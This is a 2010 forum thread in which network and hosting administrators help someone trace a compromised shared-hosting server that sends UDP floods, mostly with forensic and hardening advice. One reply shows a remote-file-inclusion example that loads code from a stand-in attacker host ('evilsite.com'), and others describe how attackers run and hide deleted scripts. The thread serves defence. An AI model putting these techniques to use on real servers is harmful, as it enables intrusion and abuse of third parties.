Security Guideance

Paul_Stewart1 · February 23, 2010, 7:46pm

Hi folks...

We have a strange series of events going on in the past while.... Brief
history here, looking for input from the community - especially some of
the security folks on here.

We provide web hosting services - one of our hosting boxes was found a
while back with root kits installed, un patched software and lots of
other "goodies". With some staff changes in place (don't think I need
to elaborate on that) we are trying to clean up several issues including
this particular server. A new server was provisioned, patched, and
deployed. User data was moved over and now the same issue is coming
back....

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

I've done tcpdumps within seconds of the attack starting and to date
been unable to find the source of this attack (we know the server, just
not sure which customer it is on the server that's been compromised).
Several hours of scanning for php, cgi, pl type files have been wasted
and come up nowhere...

It's been suggested to dump IDS in front of this box and I know I'll get
some feedback positive and negative in that aspect.

What tools/practices do others use to resolve this issue? It's a
Centos 5.4 box running latest Plesk control panel.

Typically we have found it easy to track down the offending script or
program - this time hasn't been easy at all...

Thanks,

Paul

Ronald_Cotoni · February 23, 2010, 8:19pm

Quick suggestion BUT you may want to have Parallels look into it if
you can't seem to find it since you pay for the support anyways. You
may also want to check to see if it is a cron job that is doing it (if
the machine was root kitted, you may have accidentally copied a cron
job over. Another suggestion would be simply move half the accounts
to one server and half to another and see if it ddoses again and keep
doing that until you find the problem account.

Matt_Sprague · February 23, 2010, 8:23pm

The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged onto the server at the time of the attack to narrow down your search. I like the split the users idea, though it could be several iterations to narrow down the culprit.

Paul_Bosworth · February 23, 2010, 8:31pm

Place an ids in front of the server and write a rule for the traffic
signature.

Paul B.

Michael_Holstein · February 23, 2010, 8:38pm

The user could also be running the command inline somehow or deleting the file when they log off.

"wiretapping" your SSHd is one way to find out what people are up to

Also .. if you have the resources, a passive tap and another box that
has enough disk and I/O to keep up is useful to see who was doing what
right before the packetstorm happens.

If you can take the box offline and grab a disk image, tools like "fls"
from TSK can generate a filesystem timeline, again .. who touched what
right before it started...

Cheers,

Michael Holstein
Cleveland State University

Dan_White · February 23, 2010, 8:39pm

I'll second that. I've found a few interesting items in my
/var/spool/cron/crontab before.

Also check your web server logs. If someone has compromised an account via
an apache/php vulnerability, it might show up in your access/error log
(I saw 'wget' in my logs once).

I assume you've checked 'last' to make sure they're not getting in via a
remote shell.

ls -ltra is your friend when finding the most recently created files in your
filesystem.

If you suspect there's a running process doing it, look through your /proc
directory, like in /proc/<pid>/environ, /proc/<pid>/cmdline, etc.

Derrick_H · February 23, 2010, 8:45pm

Hi folks...

We have a strange series of events going on in the past while.... Brief
history here, looking for input from the community - especially some of
the security folks on here.

We provide web hosting services - one of our hosting boxes was found a
while back with root kits installed, un patched software and lots of
other "goodies". With some staff changes in place (don't think I need
to elaborate on that) we are trying to clean up several issues including
this particular server. A new server was provisioned, patched, and
deployed. User data was moved over and now the same issue is coming
back....

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

Counting outbound udp bytes and packets can help spot anomalies.
Something like this would help but may be unwieldy if you have thousands
of users on a single box:

WANIF=eth0
userlist="userA userB user..."
for i in ${userlist}
do
iptables -N ${i}_UDP
iptables -I OUTPUT -m owner -o ${WANIF} -p udp --uid-owner ${i} -j ${i}_UDP
done

Then look at counters with:
iptables -nvL OUTPUT | grep _UDP | sort.......

I wouldn't leave this in place full-time for thousands of accounts
though without attempting to measure the impact on network performance.

David_Freedman1 · February 23, 2010, 8:47pm

What tools/practices do others use to resolve this issue?

use lsof, should be able to show you consumption of network socket
resources by process (and hence user, hopefully)

Dave.

Alexandre_Carmel-Vei · February 23, 2010, 8:51pm

These tools will relate IP flow to UID in Linux:

# Get the sockets that are open
netstat -an
# lsof (as root) sockets to pid and owner uid.
lsof

If netstat doen't show it, it could be a raw socket... Or your root-kit's
still there. Raw sockets will still show in lsof.

Alex

Chris_Adams3 · February 23, 2010, 8:55pm

Once upon a time, Matt Sprague <msprague@readytechs.com> said:

The user could also be running the command inline somehow or deleting
the file when they log off. Check who was logged onto the server at
the time of the attack to narrow down your search. I like the split
the users idea, though it could be several iterations to narrow down
the culprit.

We've also seen this with spammers. They'll upload a PHP via a
compromised account, connect to it via HTTP, and then delete it from the
filesystem. The PHP continues to run, Apache doesn't log anything
(because it only logs at the end of a request), and the admin is left
scratching his head to figure out where the problem is.

IIRC PHP holds an open file descriptor on active scripts, so you can use
lsof to look for things like this (look for "deleted" or "path inode"
entries).

Joe_Conlin · February 23, 2010, 9:15pm

From personal experience you will likely not find much help from

Parallels. We provide webhosting here on the Plesk 8.x and 9 platforms
and in similar situations I have found good results using a combination
of OSSEC (http://www.ossec.net/ BIG shout out to these guys, this
project makes my life so much easier), and enabling Apache mod_status.
Netstat, lsof, and ntop (www.ntop.org) are also useful.

Also, the default PHP configs in a Plesk deployment should to be
reviewed; I once had an IRC bot written in PHP being remotely included
into a customer's site because of a server mis-configuration (make sure
php.ini has "allow_url_fopen = Off" and "allow_url_include = Off").

Seeing as how your server is generating UDP traffic, it's possible that
your DNS (Bind) configs are allowing recursion and this is what's being
abused (Plesk is bundled with Bind to handle the vhost DNS hosting).
Either it is allowing public recursion or a local user may be abusing
local recursion abilities.... a helpful tool for monitoring DNS queries
on your server is "dnstop"
(http://dns.measurement-factory.com/tools/dnstop/).

You should also check out #plesk on freenode for a wealth of Plesk
security knowledge. Hope this helps

Joe Conlin
Access Northeast
jconlin@axsne.com
www.axsne.com

"Your Partner for IP Network Solutions"

Nate_Itkin · February 23, 2010, 9:27pm

It's possible the user inadvertently enabled the same exploit after you
rebuilt the system. I suggest caution with assigning culpability.

Nate Itkin

Valdis_Kletnieks · February 23, 2010, 10:13pm

Or the gold image used to rebuild was itself vulnerable. It happens a lot
more often than you think. I'd suggest *lots* of caution with assigning
culpability.

Nathan_Ward · February 23, 2010, 10:38pm

Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely to not work if there's a rootkit on the box. The whole point of a rootkit is to hide processes and files from these tools.

Get some statically linked versions of these bins on to the server, and hope they haven't patched your kernel.

Are you sure that it's someone who has root? How do you know? Is it not possible that it's someone running this from a PHP script or something, that they've gotten on to the server with the help of a vulnerability in some customer's website code? Maybe it's even a customer doing this intentionally?
I've seen this sort of thing where they don't even write the code to disk - some vuln in a PHP script lets them download code from some remote server and execute it from memory - PHP's require() accepts a URL.

The usual thing to do here is to take the server offline and make a copy of the disk with a writeblocker in place to prevent further changes, etc. and then inspect the image of the disk on a machine that is not using any binaries from that disk. If there really is a rootkit in place then you'll likely find it.
If you're unable to do this, perhaps boot up the server from a CD, there are plenty of forensic analysis/security targeted Linux boot CDs around.

If you're unable to capture full packets, perhaps netflow would be useful? - look for incoming data to ports you don't expect. It's much more lightweight on your data storage, and probably doesn't involve you putting in a new server - but a bit heavier on your network kit.

Joe · February 23, 2010, 10:47pm

Just figured I might add a little direction to this.

1. If its a production system that impacts several users/customers your best
bet would be to rebuild the system from scratch, not an image. Yes takes
time, but investigating it will likely take longer. As you previously
mentioned the folk(s) that were in-charge of the system are no longer in
that capacity which could (depending on the "craftiness" of them) could have
left an intentional (or not) exploit now plaguing you.

2. If your intent on finding a root cause you will probably need to spend
quite a bit of time and caution investigating the said system. As soon as
theres mention of a "rootkit" everything is suspect, i.e. ls might not be
ls, df may not be df. Might be worth adding the volume to a known good
system mounting it and comparing the image/structure and said files. But of
course as I mentioned above, if its a critical system then your kind of
stuck with an aggressive time line so...

Obviously an IDP will mask the issue, but won't fix it.

Good luck
-Joe Blanchard

Express_Web_Systems · February 23, 2010, 11:19pm

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

I've done tcpdumps within seconds of the attack starting and to date
been unable to find the source of this attack (we know the server, just
not sure which customer it is on the server that's been compromised).
Several hours of scanning for php, cgi, pl type files have been wasted
and come up nowhere...

As others have suggested turning off remote file includes is a good start in
php.ini. PHP5 has some rather nice settings to allow more flexible
configuration of this (while still allowing PHP programmers to be lazy and
do things like file('http://foo/index.php’) but I digress).

Plesk uses open_basedir by default on its Apache config which will help
limit what the hacker has access to via the web daemon. However it still
allows unrestricted access to /tmp for obvious reasons. We generally set
/tmp to be noexec and nosuid for our disk images. This helps make things
more difficult for the script kiddies, but doesn't stop them completely.

Most likely since you are dealing with customer data that must be maintained
from each instance of the server and that is most likely the attack vector
being exploited (since it is common to each instance of the server). Either
a PHP based shell, something as simple as a file uploader/shell script, or
the aforementioned remote file include is likely the cause.

They are most likely uploading a perl script to /tmp, firing it off with a
shell command via the apache user, then removing it from /tmp and masking
its program name so that it doesn't appear obvious in a report from ps (I
have seen httpd most of the time, which is fairly obvious to spot on a
Debian server thankfully - apache runs as apache(2) on Debian rather than
httpd on RedHat/CentOS).

If you are able... I would create a noexec,nosuid /tmp mount and if at all
possible... limit perl to only be accessible for the root user (chmod 700).
This is a tad extreme, but it has helped me in the past. Another thing (if
that isn't possible) is to place a wrapper around perl that will log what
user accessed perl, at what time, and which script was executed. This
information will prove to be invaluable in helping narrow down where the
attack is originating. Once you have a timestamp, it's just a matter of
going through your logs to find what was going on where at that specific
instant on the server.

Also take a look at the server wide apache logs (in /var/log) as there might
be valuable information in there perhaps leading you closer to a culprit.

Good luck, these sorts of issues are difficult to track down and take time
and patience to clean up.

If you would like please contact me off-list for more assistance. I have
been using Plesk since 1.0 so I am pretty familiar with its ins and outs.

Warm regards,

Tom Walsh

Gadi_Evron1 · February 24, 2010, 12:20am

If you can't discover the malware using methods available to you, are you able to provide with a packet dump of the DoS? Might help us pinpoint the relevant botnet and/or bot.

As to web server botnets, you may be interested in this 2007 article from me on the subject:
http://gadievron.com/publications/GadiEvron_VBFeb07.pdf

Good luck,

Gadi.

Joel_Esler2 · February 24, 2010, 1:55am

Why does there need to be blame? Diagnose the problem, fix the problem, move on with life. Someone made a mistake, learn from it, move on.

Adam_Stasiniewicz · February 24, 2010, 2:20am

I’ve seem similar. Another variant of this is PHP code that lets
arbitrary data be inputted into require() or include() statements, for
example: include(‘http://evilsite.com/evil.txt’). That way, the attacker
can then load whatever code they want and it will never be saved to the
file system. I would recommend verifying that all the shrink-wrapped
products (i.e. forums, blogs, CMS, etc) on the server be checked to ensure
that they at the most current update/patch and are not EOL. Generally
most of those vendors are good at responding to security issues in their
products, but it’s up to the person running the website to update their
code.

Also, have you considered enabling SELinux? Enforcing the targeted policy
will prevent Apache from making outbound socket connections (and may break
other stuff), but it might be worth the headache. On a similar note,
mod_security also may help (depending on how the attack is being launched)
but again may break some things.

If the attack is possibly being launched via SSH/shell access, enable
password complexity then force all of your clients to change their
password.

Hope that helps,
Adam Stasiniewicz

Laurens_Vets · February 24, 2010, 11:29am

<snip>

The problem is that a user on this box appears to be launching high
traffic DOS attacks from it towards other sites. These are UDP based
floods that move around from time to time - most of these attacks only
last a few minutes.

Maybe it's not 'malicious' at all. For instance, is there a Bittorrent client on the box?

<snip>